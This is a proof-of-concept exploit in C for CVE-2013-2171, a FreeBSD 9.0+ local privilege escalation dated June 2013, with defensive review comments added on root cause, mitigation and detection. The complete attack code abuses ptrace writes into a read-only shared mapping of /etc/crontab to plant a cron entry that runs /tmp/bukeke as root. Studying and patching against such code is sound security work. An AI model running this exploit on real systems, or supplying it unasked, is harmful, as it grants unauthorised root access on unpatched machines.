FreeBSD 9.0+ Privilege Escalation (CVE-2013-2171)
Posted on 23 June 2013
/*
 * CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap
 *
 * poc by SynQ, rdot.org, 6/2013
 *
 * don't forget to cp /etc/crontab /tmp
 *
 */

/*
 * Review notes (defensive reading of this listing):
 *
 * Root cause, as exercised here: a process that holds only a read-only,
 * MAP_SHARED mapping of a file it cannot write asks the kernel to store
 * into that mapping through ptrace(PT_WRITE_D) on a traced child. On
 * kernels affected by this CVE the store is not rejected on the basis of
 * the mapping's protection, so it lands in the shared pages that back the
 * file.
 *
 * Mitigation: install the vendor fix for CVE-2013-2171. The vendor
 * advisory also describes a workaround of denying ptrace to unprivileged
 * users with the sysctl security.bsd.unprivileged_proc_debug set to 0,
 * which also disables debuggers for those users.
 *
 * Detection: the listing targets /etc/crontab, so integrity monitoring of
 * root-owned files that are world-readable (crontab in particular) and
 * review of crontab for entries that run programs from world-writable
 * directories such as /tmp are the relevant checks.
 *
 * NOTE(review): the printf() messages end in a space rather than "\n";
 * the newline escapes were probably lost when the page was extracted.
 */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/types.h>

/*
 * Despite the name, this is not machine code: it is a crontab-format line
 * (five "*" schedule fields, user "root", command /tmp/bukeke). The
 * trailing '#' would turn whatever follows it on the same line of the
 * target file into a comment.
 */
char sc[]="* * * * * root /tmp/bukeke #";

/*
 * Runs in the forked child: requests tracing by its parent with
 * PT_TRACE_ME and reports a failure of that call.
 *
 * The if statement has no braces, so exit(1) is not governed by it and
 * runs on every path; the function never returns to its caller.
 */
void child() {
	int status;

	status = ptrace(PT_TRACE_ME, 0, 0, 0);
	if (status != 0)
		printf("child ptrace error ");
	exit(1);
}

/*
 * Maps /etc/crontab read-only, forks a child to trace, and then issues
 * ptrace writes against the address of that mapping in the child.
 *
 * Returns 0 after printing "done."; exits with status 1 if open, mmap,
 * fork or either wait fails. The results of the PT_ATTACH, PT_WRITE_D and
 * PT_DETACH calls are never checked, so the program's output says nothing
 * about whether a write took effect: when using this to confirm a patch,
 * compare the file's content before and after instead.
 */
int main() {
	int pid, fd, i;
	char *addr;

	/* The file is opened O_RDONLY: this process has no write access to it. */
	fd = open("/etc/crontab", O_RDONLY);
	if (fd<0) {
		printf("open failed ");
		exit(1);
	}

	/*
	 * PROT_READ + MAP_SHARED over the first 4096 bytes of the file. Being
	 * shared, the pages are the file's own pages rather than a private
	 * copy, which is why a store that the kernel lets through changes the
	 * file itself.
	 */
	addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);
	if (addr == MAP_FAILED) {
		printf("mmap fault ");
		exit(1);
	}

	/* The mapping is created before fork(), so the child has it at addr too. */
	pid = fork();
	if (pid == -1) {
		printf("fork failed ");
		exit(1);
	} else if (pid == 0)
		child();

	/* Parent only from here on: child() does not return. */
	ptrace(PT_ATTACH, pid, 0, 0);
	if (wait(0) == -1) {
		printf("wait failed ");
		exit(1);
	}

	printf("writing shellcode... ");
	/*
	 * One PT_WRITE_D per int-sized word of sc, each aimed at the matching
	 * offset inside the read-only mapping. sizeof(sc)/4 rounds down, so
	 * only whole 4-byte words are sent. A patched kernel is expected to
	 * refuse these stores.
	 */
	for(i=0; i < sizeof(sc)/4; i++)
		ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);

	ptrace(PT_DETACH, pid, 0, 0);
	if (wait(0) == -1) {
		printf("wait2 failed ");
		exit(1);
	}

	printf("done. ");
	return 0;
}
